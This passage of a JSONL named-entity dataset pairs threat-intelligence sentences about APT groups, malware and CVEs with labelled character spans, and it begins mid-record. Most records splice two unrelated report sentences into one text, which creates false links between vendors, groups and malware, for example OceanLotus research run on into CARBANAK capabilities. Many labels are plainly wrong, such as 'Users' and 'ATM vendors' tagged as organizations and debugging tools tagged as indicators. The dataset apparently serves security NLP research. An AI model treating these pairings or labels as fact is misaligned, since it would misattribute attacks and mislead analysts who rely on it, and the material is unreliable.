461, "end": 475, "label": "Indicator"}, {"start": 495, "end": 501, "label": "Organization"}, {"start": 575, "end": 598, "label": "Organization"}, {"start": 856, "end": 865, "label": "Organization"}, {"start": 877, "end": 884, "label": "Organization"}]}
{"text": "After thorough analysis , ESET researchers are highly confident that this campaign is run by the OceanLotus group , also known as APT32 and APT-C-00 . The malware may inject itself into browser processes and explorer.exe .", "spans": [{"start": 26, "end": 30, "label": "Organization"}, {"start": 97, "end": 107, "label": "Organization"}, {"start": 130, "end": 135, "label": "Organization"}, {"start": 140, "end": 148, "label": "Organization"}, {"start": 155, "end": 162, "label": "Malware"}, {"start": 208, "end": 220, "label": "Indicator"}]}
{"text": "360 Helios Team captured the first Trojan of the Poison Ivy Group in December 2007 . In the last few weeks , FormBook was seen downloading other malware families such as NanoCore .", "spans": [{"start": 0, "end": 15, "label": "Organization"}, {"start": 49, "end": 59, "label": "System"}, {"start": 109, "end": 117, "label": "Indicator"}, {"start": 170, "end": 178, "label": "Indicator"}]}
{"text": "Through research , 360 Helios Team has found that , since 2007 , the Poison Ivy Group has carried out 11 years of cyber espionage campaigns against Chinese key units and departments , such as national defense , government , science and technology , education and maritime agencies . The vulnerability is bypassing most mitigations; however , as noted above , FireEye email and network products detect the malicious documents .", "spans": [{"start": 19, "end": 34, "label": "Organization"}, {"start": 69, "end": 85, "label": "Organization"}, {"start": 192, "end": 208, "label": "Organization"}, {"start": 211, "end": 221, "label": "Organization"}, {"start": 224, "end": 231, "label": "Organization"}, {"start": 236, "end": 246, "label": "Organization"}, {"start": 249, "end": 258, "label": "Organization"}, {"start": 263, "end": 280, "label": "Organization"}, {"start": 359, "end": 366, "label": "Organization"}, {"start": 367, "end": 372, "label": "System"}, {"start": 405, "end": 424, "label": "Indicator"}]}
{"text": "In addition , Antiy Lab revealed the APT organization Green Spot on September 19 , 2018 . Through the exploitation of the HTA handler vulnerability described in CVE-2017-1099 , the observed RTF attachments download .", "spans": [{"start": 14, "end": 23, "label": "Organization"}, {"start": 54, "end": 64, "label": "Organization"}, {"start": 161, "end": 174, "label": "Vulnerability"}, {"start": 190, "end": 193, "label": "System"}]}
{"text": "Recently , the 360 Core Security discovered an APT attack code named as APT-C-26 against cryptocurrency institutions and related individuals . In early May , the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199 .", "spans": [{"start": 15, "end": 32, "label": "Organization"}, {"start": 72, "end": 80, "label": "Organization"}, {"start": 187, "end": 190, "label": "System"}, {"start": 222, "end": 231, "label": "Organization"}, {"start": 232, "end": 239, "label": "System"}, {"start": 267, "end": 280, "label": "Vulnerability"}]}
{"text": "This APT attack was analyzed and attributed upon the detection and 360 Core Security now confirmed its association with the APT-C-06 Group . In their current campaign , APT32 has leveraged ActiveMime files that employ social engineering methods to entice the victim into enabling macros .", "spans": [{"start": 67, "end": 84, "label": "Organization"}, {"start": 124, "end": 132, "label": "Organization"}, {"start": 169, "end": 174, "label": "Organization"}, {"start": 189, "end": 205, "label": "Indicator"}]}
{"text": "In April , 2018 , the 360 Core Security takes the lead in capturing the APT-C-06 group\u2019s new APT attack using 0-day vulnerabilities (CVE-2018-8174) in the wild . APT32 actors continue to deliver the malicious attachments via spear-phishing emails .", "spans": [{"start": 22, "end": 39, "label": "Organization"}, {"start": 72, "end": 80, "label": "Organization"}, {"start": 132, "end": 147, "label": "Vulnerability"}, {"start": 162, "end": 167, "label": "Organization"}, {"start": 199, "end": 220, "label": "Indicator"}, {"start": 240, "end": 246, "label": "System"}]}
{"text": "ESET researchers have dissected some of the latest additions to the malicious toolkit of the Advanced Persistent Threat (APT) group known as OceanLotus , also dubbed APT32 and APT-C-00 . Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 68, "end": 85, "label": "System"}, {"start": 141, "end": 151, "label": "Organization"}, {"start": 166, "end": 171, "label": "Organization"}, {"start": 176, "end": 184, "label": "Organization"}, {"start": 267, "end": 275, "label": "Indicator"}]}
{"text": "Earlier this year , our colleagues at Symantec uncovered an interesting story about the use of Equation group exploitation tools by an alleged Chinese group named Buckeye a.k.a APT3 , or UPS team . February saw three particularly interesting publications on the topic of macOS malware: a Trojan Cocoa application that sends system information including keychain data back to the attacker , a macOS version of APT28\u2019s Xagent malware , and a new Trojan ransomware .", "spans": [{"start": 38, "end": 46, "label": "Organization"}, {"start": 95, "end": 103, "label": "Organization"}, {"start": 163, "end": 170, "label": "Organization"}, {"start": 177, "end": 181, "label": "Organization"}, {"start": 288, "end": 294, "label": "Malware"}, {"start": 379, "end": 387, "label": "Organization"}, {"start": 409, "end": 416, "label": "Organization"}, {"start": 444, "end": 461, "label": "Indicator"}]}
{"text": "In addition , OceanLotus is also known to use \u2018watering hole attacks\u2019 , which involve the compromise of a website that the victim is likely to visit . As early as March 4 , 2017 , malicious documents exploiting CVE-2017-0199 were used to deliver the LATENTBOT malware .", "spans": [{"start": 14, "end": 24, "label": "Organization"}, {"start": 180, "end": 199, "label": "Indicator"}, {"start": 211, "end": 224, "label": "Vulnerability"}, {"start": 250, "end": 259, "label": "Malware"}, {"start": 260, "end": 267, "label": "Malware"}]}
{"text": "Kaspersky found Zebrocy deploying a compiled Python script , which we call PythocyDbg , within a Southeast Asian foreign affairs organization: this module primarily provides for the stealthy collection of network proxy and communications debug capabilities . The first , st07383.en17.docx , continues by utilizing 32 or 64 bit versions of CVE-2017-0001 to escalate privileges before executing a final JavaScript payload containing a malware implant known as SHIRIME .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 16, "end": 23, "label": "Organization"}, {"start": 45, "end": 58, "label": "System"}, {"start": 75, "end": 85, "label": "System"}, {"start": 271, "end": 288, "label": "Indicator"}, {"start": 339, "end": 352, "label": "Vulnerability"}, {"start": 458, "end": 465, "label": "Indicator"}]}
{"text": "ESET researchers have investigated a distinctive backdoor used by the notorious APT group known as Turla (or Snake , or Uroburos) to siphon off sensitive communications from the authorities of at least three European countries . This vulnerability was found in a document named Trump's_Attack_on_Syria_English.docx .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 99, "end": 104, "label": "Organization"}, {"start": 109, "end": 114, "label": "Organization"}, {"start": 120, "end": 129, "label": "Organization"}, {"start": 278, "end": 314, "label": "Indicator"}]}
{"text": "Dragos has reported that XENOTIME , the APT group behind the TRISIS (aka TRITON and HatMan) attack on a Saudi Arabian petro-chemical facility in 2017 , has expanded its focus beyond the oil and gas industries . To install and register the malicious shim database on a system , FIN7 used a custom Base64 encoded PowerShell script , which ran the sdbinst.exe\u201d utility to register a custom shim database file containing a patch onto a system .", "spans": [{"start": 0, "end": 6, "label": "Organization"}, {"start": 25, "end": 33, "label": "Organization"}, {"start": 61, "end": 67, "label": "Organization"}, {"start": 186, "end": 189, "label": "Organization"}, {"start": 194, "end": 208, "label": "Organization"}, {"start": 277, "end": 281, "label": "Organization"}, {"start": 311, "end": 328, "label": "Malware"}, {"start": 345, "end": 357, "label": "Indicator"}]}
{"text": "ESET researchers have observed a significant change in the campaign of the infamous espionage group . During the investigations , Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of services.exe\u201d with their CARBANAK payload .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 94, "end": 99, "label": "Organization"}, {"start": 130, "end": 138, "label": "Organization"}, {"start": 153, "end": 157, "label": "Organization"}, {"start": 234, "end": 247, "label": "Indicator"}, {"start": 259, "end": 267, "label": "Malware"}]}
{"text": "On the technical side , since mid-January Kaspersky researchers have been tracking an active Turla campaign targeting government bodies in Turkmenistan and Tajikistan . We have not yet identified FIN7\u2019s ultimate goal in this campaign , as we have either blocked the delivery of the malicious emails or our FaaS team detected and contained the attack early enough in the lifecycle before we observed any data targeting or theft .", "spans": [{"start": 42, "end": 51, "label": "Organization"}, {"start": 93, "end": 98, "label": "Organization"}, {"start": 118, "end": 128, "label": "Organization"}, {"start": 196, "end": 202, "label": "Organization"}, {"start": 282, "end": 298, "label": "Indicator"}]}
{"text": "Kaspersky also published details on how Zebrocy has added the Go\u201d language to its arsenal \u2013 the first time that we have observed a well-known APT threat actor deploy malware with this compiled , open source language . Figure 1 shows a sample phishing email used by HawkEye operators in this latest campaign .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 40, "end": 47, "label": "Organization"}, {"start": 242, "end": 256, "label": "Indicator"}]}
{"text": "ESET researchers have found that Turla , the notorious state-sponsored cyberespionage group , has added a fresh weapon to its arsenal that is being used in new campaigns targeting embassies and consulates in the post-Soviet states . Many groups leverage the regsvr32.exe application whitelisting bypass , including APT19 in their 2017 campaign against law firms .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 33, "end": 38, "label": "Organization"}, {"start": 258, "end": 270, "label": "Indicator"}, {"start": 315, "end": 320, "label": "Organization"}, {"start": 352, "end": 361, "label": "Organization"}]}
{"text": "Turla has been operating for a number of years and its activities have been monitored and analyzed by ESET research laboratories . The malware was initially distributed through a compromised software update system and then self-propagated through stolen credentials and SMB exploits , including the EternalBlue exploit used in the WannaCry attack from May 2017 .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 102, "end": 106, "label": "Organization"}, {"start": 135, "end": 142, "label": "Indicator"}, {"start": 299, "end": 318, "label": "Malware"}, {"start": 331, "end": 339, "label": "Organization"}]}
{"text": "Kaspersky researchers attribute the campaign , which we call SpoiledLegacy\u201d , to the LuckyMouse APT group (aka EmissaryPanda and APT27) . The malware appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD to decrypt the data .", "spans": [{"start": 0, "end": 9, "label": "Organization"}, {"start": 85, "end": 95, "label": "Organization"}, {"start": 111, "end": 124, "label": "Organization"}, {"start": 129, "end": 135, "label": "Organization"}, {"start": 142, "end": 149, "label": "Indicator"}, {"start": 188, "end": 203, "label": "Indicator"}]}
{"text": "Further tracking of the Lazarus\u2019s activities has enabled Kaspersky researchers to discover a new operation , active since at least November 2018 , which utilizes PowerShell to control Windows systems and Mac OS malware to target Apple customers . The malware then builds two DLLs in memory \u2013 they are 32 and 64-bit DLLs that have identical functionality .", "spans": [{"start": 24, "end": 33, "label": "Organization"}, {"start": 57, "end": 66, "label": "Organization"}, {"start": 162, "end": 172, "label": "System"}, {"start": 229, "end": 244, "label": "Organization"}, {"start": 251, "end": 258, "label": "Indicator"}, {"start": 275, "end": 279, "label": "Indicator"}]}
{"text": "However , over the last nine campaigns since Trend Micro\u2018s June report , TA505 also started using .ISO image attachments as the point of entry , as well as a .NET downloader , a new style for macro delivery , a newer version of ServHelper , and a .DLL variant of FlawedAmmyy downloader . The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments -m security .", "spans": [{"start": 45, "end": 58, "label": "Organization"}, {"start": 73, "end": 78, "label": "Organization"}, {"start": 158, "end": 173, "label": "System"}, {"start": 228, "end": 238, "label": "System"}, {"start": 247, "end": 259, "label": "Malware"}, {"start": 292, "end": 299, "label": "Indicator"}, {"start": 338, "end": 349, "label": "Indicator"}]}
{"text": "In this blog post , FireEye researchers are going to examine a recent instance where FireEye Managed Defense came toe-to-toe with APT41 . The malware then writes the R resource data to the file C:\\WINDOWS\\tasksche.exe .", "spans": [{"start": 20, "end": 27, "label": "Organization"}, {"start": 85, "end": 92, "label": "Organization"}, {"start": 130, "end": 135, "label": "Organization"}, {"start": 142, "end": 149, "label": "Indicator"}, {"start": 189, "end": 193, "label": "Indicator"}, {"start": 194, "end": 217, "label": "Indicator"}]}
{"text": "The group has demonstrated access to zero-day vulnerabilities (CVE-2018-0802) , and the ability to incorporate them into operations . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 62, "end": 77, "label": "Vulnerability"}, {"start": 152, "end": 161, "label": "Indicator"}]}
{"text": "More information on this threat actor is found in our report , APT37 (Reaper): The Overlooked North Korean Actor . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings .", "spans": [{"start": 63, "end": 68, "label": "Organization"}, {"start": 133, "end": 142, "label": "Indicator"}]}
{"text": "There have been reports of real-time phishing in the wild as early as 2010 . The usefulness of flare-qdb can be seen in cases such as loops dealing with strings .", "spans": [{"start": 95, "end": 104, "label": "Indicator"}]}
{"text": "Explanation of ToolTo improve social engineering assessments , we developed a tool \u2013 named ReelPhish \u2013 that simplifies the real-time phishing technique . Attaching with IDA Pro via WinDbg as in Figure 11 shows that the program counter points to the infinite loop written in memory allocated by flare-qdb .", "spans": [{"start": 91, "end": 100, "label": "System"}, {"start": 169, "end": 176, "label": "Indicator"}, {"start": 181, "end": 187, "label": "Indicator"}]}
{"text": "We assess with high confidence that this activity is carried out on behalf of the North Korean government given malware development artifacts and targeting that aligns with North Korean state interests . We have also observed them using virtual private network services that use IPs based in numerous countries to ensure anonymity and obfuscate criminal operations .", "spans": [{"start": 226, "end": 230, "label": "Indicator"}]}
{"text": "Known targets of this group have been involved in the maritime industry , as well as engineering-focused entities , and include research institutes , academic organizations , and private firms in the United States . Once downloaded and executed , it drops an intermediate payload that further downloads a Pony DLL and Vawtrak executable , which perform data theft and connect to a command and control ( C2 ) server .", "spans": [{"start": 22, "end": 27, "label": "Organization"}, {"start": 54, "end": 62, "label": "Organization"}, {"start": 128, "end": 147, "label": "Organization"}, {"start": 150, "end": 172, "label": "Organization"}, {"start": 179, "end": 192, "label": "Organization"}, {"start": 305, "end": 313, "label": "Indicator"}, {"start": 318, "end": 325, "label": "Indicator"}, {"start": 403, "end": 405, "label": "System"}]}
{"text": "By releasing ReelPhish , we at Mandiant hope to highlight the need for multiple layers of security and discourage the reliance on any single security mechanism . The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that \u2013 when enabled \u2013 leads to the download of Hancitor .", "spans": [{"start": 31, "end": 39, "label": "Organization"}, {"start": 186, "end": 192, "label": "System"}, {"start": 311, "end": 319, "label": "Indicator"}]}
{"text": "The group has also been reported as Leviathanby other security firms . After the executable is executed , it downloads Pony and Vawtrak malware variants to steal data .", "spans": [{"start": 4, "end": 9, "label": "Organization"}, {"start": 36, "end": 47, "label": "Organization"}, {"start": 119, "end": 123, "label": "Indicator"}, {"start": 128, "end": 135, "label": "Indicator"}]}
{"text": "Like multiple other Chinese cyber espionage actors , TEMP.Periscope has recently re-emerged and has been observed conducting operations with a revised toolkit . Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll\u201d along with a standard Vawtrak Trojan .", "spans": [{"start": 53, "end": 67, "label": "Organization"}, {"start": 263, "end": 275, "label": "Indicator"}, {"start": 278, "end": 285, "label": "Indicator"}, {"start": 316, "end": 322, "label": "Malware"}]}
{"text": "The tool then starts a new web browser instance on the attacker\u2019s system and submits credentials on the real VPN portal . In this blog , FireEye Labs dissects this new ATM malware that we have dubbed RIPPER and documents indicators that strongly suggest this piece of malware is the one used to steal from the ATMs at banks in Thailand .", "spans": [{"start": 55, "end": 65, "label": "Organization"}, {"start": 137, "end": 144, "label": "Organization"}, {"start": 168, "end": 171, "label": "System"}, {"start": 172, "end": 179, "label": "Malware"}, {"start": 200, "end": 206, "label": "Malware"}, {"start": 318, "end": 323, "label": "Organization"}]}
{"text": "These tools include:AIRBREAK: a JavaScript-based backdoor also reported as Orz that retrieves commands from hidden strings in compromised webpages and actor controlled profiles on legitimate services.BADFLICK: a backdoor that is capable of modifying the file system , generating a reverse shell , and modifying its command and control (C2) configuration . RIPPER interacts with the ATM by inserting a specially manufactured ATM card with an EMV chip that serves as the authentication mechanism .", "spans": [{"start": 32, "end": 57, "label": "System"}, {"start": 356, "end": 362, "label": "Malware"}]}
{"text": "HOMEFRY: a 64-bit Windows password dumper/cracker that has previously been used in conjunction with AIRBREAK and BADFLICK backdoors . RIPPER will examine the contents of directories associated with the targeted ATM vendors and will replace legitimate executables with itself .", "spans": [{"start": 100, "end": 108, "label": "System"}, {"start": 113, "end": 121, "label": "System"}, {"start": 134, "end": 140, "label": "Malware"}, {"start": 211, "end": 222, "label": "Organization"}]}
{"text": "The following are tools that TEMP.Periscope has leveraged in past operations and could use again , though these have not been seen in the current wave of activity:Beacon: a backdoor that is commercially available as part of the Cobalt Strike software platform , commonly used for pen-testing network environments . This malware family can be used to compromise multiple vendor platforms and leverages uncommon technology to access physical devices .", "spans": [{"start": 29, "end": 43, "label": "Organization"}, {"start": 228, "end": 241, "label": "Organization"}, {"start": 320, "end": 327, "label": "Indicator"}]}
{"text": "This entry was posted on Fri Mar 16 00:00 EDT 2018 and filed under Targeted Attacks , FireEye , and China . From our trend analysis seen in Figure 3 , Locky ransomware started being delivered via DOCM format email attachments more extensively beginning in August .", "spans": [{"start": 86, "end": 93, "label": "Organization"}, {"start": 151, "end": 156, "label": "Indicator"}, {"start": 208, "end": 213, "label": "System"}]}
{"text": "Read our report , APT37 (Reaper): The Overlooked North Korean Actor , to learn more about our assessment that this threat actor is working on behalf of the North Korean government , as well as various other details about their operations . Discovered for the first time in Mexico back in 2013 , Ploutus enabled criminals to empty ATMs using either an external keyboard attached to the machine or via SMS message , a technique that had never been seen before .", "spans": [{"start": 18, "end": 23, "label": "Organization"}, {"start": 156, "end": 179, "label": "Organization"}, {"start": 295, "end": 302, "label": "Indicator"}]}
{"text": "A brief timeline of this activity is shown in Figure 1.Figure 1: Timeline of this recently observed spear phishing campaign . FireEye Labs recently identified a previously unobserved version of Ploutus , dubbed Ploutus-D , that interacts with KAL\u2019s Kalignite multivendor ATM platform .", "spans": [{"start": 126, "end": 133, "label": "Organization"}, {"start": 194, "end": 201, "label": "Indicator"}, {"start": 211, "end": 220, "label": "Indicator"}]}
{"text": "The first part of the campaign From Jan. 23 , 2018 , to Feb. 26 , 2018 used a macro-based document that dropped a VBS file and an INI file . The samples we identified target the ATM vendor Diebold .", "spans": [{"start": 114, "end": 122, "label": "Malware"}, {"start": 130, "end": 138, "label": "Malware"}, {"start": 145, "end": 152, "label": "Indicator"}, {"start": 178, "end": 196, "label": "Organization"}]}
{"text": "One such email that we were able to obtain was targeting users in Turkey , as shown in Figure 4:Figure 4: Sample spear phishing email containing macro-based document attachment The malicious Microsoft Office attachments that we observed appear to have been specially crafted for individuals in four countries: Turkey , Pakistan , Tajikistan and India . This blog covers the changes , improvements , and Indicators of Compromise (IOC) of Ploutus-D in order to help financial organizations identify and defend against this threat .", "spans": [{"start": 208, "end": 219, "label": "System"}, {"start": 437, "end": 446, "label": "Indicator"}, {"start": 464, "end": 473, "label": "Organization"}]}
{"text": "The INI file contains the Base64 encoded PowerShell command , which will be decoded and executed by PowerShell using the command line generated by the VBS file on execution using WScript.exe . Ploutus-D also allows the attackers to enter the amount to withdraw (billUnits \u2013 4 digits) and the number of cycles (billCount \u2013 2 digits) to repeat the dispensing operation (see Figure 10) .", "spans": [{"start": 4, "end": 12, "label": "Malware"}, {"start": 100, "end": 110, "label": "System"}, {"start": 151, "end": 159, "label": "Malware"}, {"start": 179, "end": 190, "label": "Malware"}, {"start": 193, "end": 202, "label": "Indicator"}, {"start": 219, "end": 228, "label": "Organization"}]}
{"text": "cmstp.exe system restart , cmstp.exe will be used to execute the SCT file indirectly through the INF file . Ploutus-D will load KXCashDispenserLib\u201d library implemented by Kalignite Platform (K3A.Platform.dll) to interact with the XFS Manager and control the Dispenser (see Figure 13) .", "spans": [{"start": 0, "end": 9, "label": "Malware"}, {"start": 27, "end": 36, "label": "Malware"}, {"start": 65, "end": 73, "label": "Malware"}, {"start": 97, "end": 105, "label": "Malware"}, {"start": 108, "end": 117, "label": "Indicator"}, {"start": 190, "end": 208, "label": "Indicator"}]}
{"text": "The following are the three files:Defender.sct \u2013 The malicious JavaScript based scriptlet file . Since Ploutus-D interacts with the Kalignite Platform , only minor modifications to the Ploutus-D code may be required to target different ATM vendors worldwide .", "spans": [{"start": 28, "end": 46, "label": "Malware"}, {"start": 80, "end": 89, "label": "Malware"}, {"start": 90, "end": 94, "label": "Malware"}, {"start": 103, "end": 112, "label": "Indicator"}, {"start": 185, "end": 194, "label": "Indicator"}, {"start": 236, "end": 247, "label": "Organization"}]}
{"text": "FireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017 . The threat actors used two publicly available techniques , an AppLocker whitelisting bypass and a script to inject shellcode into the userinit.exe process .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 79, "end": 93, "label": "Vulnerability"}, {"start": 178, "end": 184, "label": "Organization"}, {"start": 301, "end": 313, "label": "Indicator"}]}
{"text": "Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors . The regsvr32.exe executable can be used to download a Windows Script Component file (SCT file) by passing the URL of the SCT file as an argument .", "spans": [{"start": 0, "end": 5, "label": "Organization"}, {"start": 93, "end": 99, "label": "Organization"}, {"start": 106, "end": 118, "label": "Indicator"}, {"start": 156, "end": 163, "label": "System"}, {"start": 223, "end": 231, "label": "Indicator"}]}
{"text": "This entry was posted on Tue Mar 13 12:15 EDT 2018 and filed under Yogesh Londhe , Dileep . We observed implementation of this bypass in the macro code to invoke regsvr32.exe , along with a URL passed to it which was hosting a malicious SCT file .", "spans": [{"start": 67, "end": 80, "label": "Organization"}, {"start": 83, "end": 89, "label": "Organization"}, {"start": 162, "end": 174, "label": "Indicator"}, {"start": 237, "end": 245, "label": "Indicator"}]}
{"text": "If the lateral movement with credentials fails , then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue , and uses it to spread to that host . There was code to download a decoy document from the Internet and open it in a second winword.exe process using the Start-Process cmdlet .", "spans": [{"start": 71, "end": 90, "label": "System"}, {"start": 218, "end": 229, "label": "Vulnerability"}, {"start": 355, "end": 366, "label": "Indicator"}, {"start": 385, "end": 398, "label": "Indicator"}, {"start": 399, "end": 405, "label": "Indicator"}]}
{"text": "Tactic #1: Delivering the miner directly to a vulnerable serverSome tactics we've observed involve exploiting CVE-2017-10271 , leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1) , and executing it using ShellExecute() . Ordnance will be able to immediately generate shellcode after users provide the IP and PROT that the shellcode should connect to or listen on .", "spans": [{"start": 110, "end": 124, "label": "Vulnerability"}, {"start": 138, "end": 148, "label": "System"}, {"start": 258, "end": 266, "label": "Indicator"}, {"start": 338, "end": 340, "label": "Indicator"}, {"start": 359, "end": 368, "label": "Indicator"}]}
{"text": "The malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server . DarkPulsar is a very interesting administrative module for controlling a passive backdoor named ' sipauth32.tsp ' that provides remote control , belonging to this category .", "spans": [{"start": 87, "end": 104, "label": "System"}, {"start": 156, "end": 166, "label": "Malware"}, {"start": 237, "end": 245, "label": "Malware"}, {"start": 254, "end": 267, "label": "Indicator"}]}
{"text": "Notably , cryptocurrency mining malware is being distributed using various tactics , typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits . One of them \u2013 ipv4.dll \u2013 has been placed by the APT with what is , in fact , a downloader for other malicious components .", "spans": [{"start": 67, "end": 82, "label": "System"}, {"start": 144, "end": 159, "label": "Organization"}, {"start": 217, "end": 225, "label": "Indicator"}, {"start": 282, "end": 292, "label": "Malware"}]}
{"text": "After all network derived IPs have been processed , the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host . Written in pure C language , Canhadr/Ndriver provides full access to the hard drive and operating memory despite device security restrictions , and carries out integrity control of various system components to avoid debugging and security detection .", "spans": [{"start": 56, "end": 63, "label": "Malware"}, {"start": 118, "end": 128, "label": "Malware"}, {"start": 133, "end": 144, "label": "Malware"}, {"start": 186, "end": 187, "label": "System"}, {"start": 199, "end": 214, "label": "Indicator"}]}
{"text": "They have taken interest in subject matter of direct importance to the Democratic People's Republic of Korea (DPRK) such as Korean unification efforts and North Korean defectors . First observed in mid-2014 , this malware shared code with the Bugat ( aka Feodo ) banking Trojan .", "spans": [{"start": 0, "end": 4, "label": "Organization"}, {"start": 243, "end": 248, "label": "Malware"}, {"start": 255, "end": 260, "label": "Malware"}, {"start": 263, "end": 270, "label": "Organization"}, {"start": 271, "end": 277, "label": "Malware"}]}
{"text": "We assess that the actors employing this latest Flash zero-day are a suspected North Korean group we track as TEMP.Reaper . In all emails sent to these government officials , the actor used the same attachment : a malicious Microsoft Word document that exploited the CVE-2012-0158 vulnerability to drop a malicious payload .", "spans": [{"start": 54, "end": 62, "label": "Vulnerability"}, {"start": 110, "end": 121, "label": "Organization"}, {"start": 131, "end": 137, "label": "System"}, {"start": 152, "end": 172, "label": "Organization"}, {"start": 214, "end": 247, "label": "Indicator"}, {"start": 267, "end": 280, "label": "Vulnerability"}]}
{"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Despite being an older vulnerability , many threat actors continue to leverage CVE-2012-0158 to exploit Microsoft Word .", "spans": [{"start": 71, "end": 94, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 217, "end": 230, "label": "Vulnerability"}, {"start": 234, "end": 241, "label": "Vulnerability"}, {"start": 242, "end": 256, "label": "Indicator"}]}
{"text": "While we have observed other suspected North Korean threat groups such as TEMP.Hermit employ wiper malware in disruptive attacks , we have not thus far observed TEMP.Reaper use their wiper malware actively against any targets . Whitefly first infects its victims using a dropper in the form of a malicious.exe or .dll file that is disguised as a document or image .", "spans": [{"start": 74, "end": 85, "label": "Organization"}, {"start": 161, "end": 172, "label": "Organization"}, {"start": 228, "end": 236, "label": "Organization"}, {"start": 271, "end": 278, "label": "Malware"}, {"start": 296, "end": 309, "label": "Indicator"}, {"start": 313, "end": 322, "label": "Indicator"}]}
{"text": "In the past year , FireEye iSIGHT Intelligence has discovered newly developed wiper malware being deployed by TEMP.Reaper , which we detect as RUHAPPY . CraP2P has frequently been used to distribute other malware such as Locky and Dridex , but also supported large scale spam campaigns for dating advertisement and pump-and-dump scams after the demise of Kelihos .", "spans": [{"start": 19, "end": 33, "label": "Organization"}, {"start": 110, "end": 121, "label": "Organization"}, {"start": 153, "end": 159, "label": "Indicator"}, {"start": 221, "end": 226, "label": "Malware"}, {"start": 231, "end": 237, "label": "Malware"}]}
{"text": "Historically , the majority of their targeting has been focused on the South Korean government , military , and defense industrial base . Once the LOWBALL malware calls back to the Dropbox account , the admin@338 will create a file called upload.bat which contains commands to be executed on the compromised computer .", "spans": [{"start": 71, "end": 94, "label": "Organization"}, {"start": 97, "end": 105, "label": "Organization"}, {"start": 112, "end": 119, "label": "Organization"}, {"start": 147, "end": 154, "label": "Malware"}, {"start": 155, "end": 162, "label": "Malware"}, {"start": 181, "end": 188, "label": "System"}, {"start": 203, "end": 212, "label": "Organization"}, {"start": 239, "end": 249, "label": "Indicator"}]}
{"text": "FireEye products have robust detection for the malware used in this campaign . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe , \" which targeted dissident activity among the Vietnamese diaspora in Southeast Asia .", "spans": [{"start": 0, "end": 7, "label": "Organization"}, {"start": 89, "end": 94, "label": "Organization"}, {"start": 193, "end": 204, "label": "Indicator"}, {"start": 264, "end": 272, "label": "Organization"}]}
{"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . In 2014 , APT32 leveraged a spear-phishing attachment titled \" Plans to crackdown on protesters at the Embassy of Vietnam.exe \" .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 54, "end": 68, "label": "Organization"}, {"start": 94, "end": 110, "label": "Organization"}, {"start": 157, "end": 174, "label": "Organization"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 190, "end": 204, "label": "Organization"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 258, "end": 279, "label": "Organization"}, {"start": 292, "end": 297, "label": "Organization"}, {"start": 396, "end": 407, "label": "Indicator"}]}
{"text": "TEMP.Periscope BackgroundActive since at least 2013 , TEMP.Periscope has primarily focused on maritime-related targets across multiple verticals , including engineering firms , shipping and transportation , manufacturing , defense , government offices , and research universities . More recently , in May 2017 , APT33 appeared to target a Saudi organization and a South Korean business conglomerate using a malicious file that attempted to entice victims with job vacancies for a Saudi Arabian petrochemical company .", "spans": [{"start": 0, "end": 14, "label": "Organization"}, {"start": 54, "end": 68, "label": "Organization"}, {"start": 94, "end": 110, "label": "Organization"}, {"start": 157, "end": 174, "label": "Organization"}, {"start": 177, "end": 185, "label": "Organization"}, {"start": 190, "end": 204, "label": "Organization"}, {"start": 207, "end": 220, "label": "Organization"}, {"start": 223, "end": 230, "label": "Organization"}, {"start": 233, "end": 243, "label": "Organization"}, {"start": 258, "end": 279, "label": "Organization"}, {"start": 312, "end": 317, "label": "Organization"}, {"start": 345, "end": 357, "label": "Organization"}, {"start": 377, "end": 398, "label": "Organization"}, {"start": 407, "end": 421, "label": "Indicator"}, {"start": 494, "end": 515, "label": "Organization"}]}
{"text": "Infection VectorWe have observed this recent wave of Zyklon malware being delivered primarily through spam emails . More recently , in May 2017 , APT33 appeared to target organizations in Saudi and South Korea using a malicious file that attempted to entice victims with job vacancies .", "spans": [{"start": 53, "end": 59, "label": "Organization"}, {"start": 102, "end": 113, "label": "System"}, {"start": 146, "end": 151, "label": "Organization"}, {"start": 218, "end": 232, "label": "Indicator"}]}
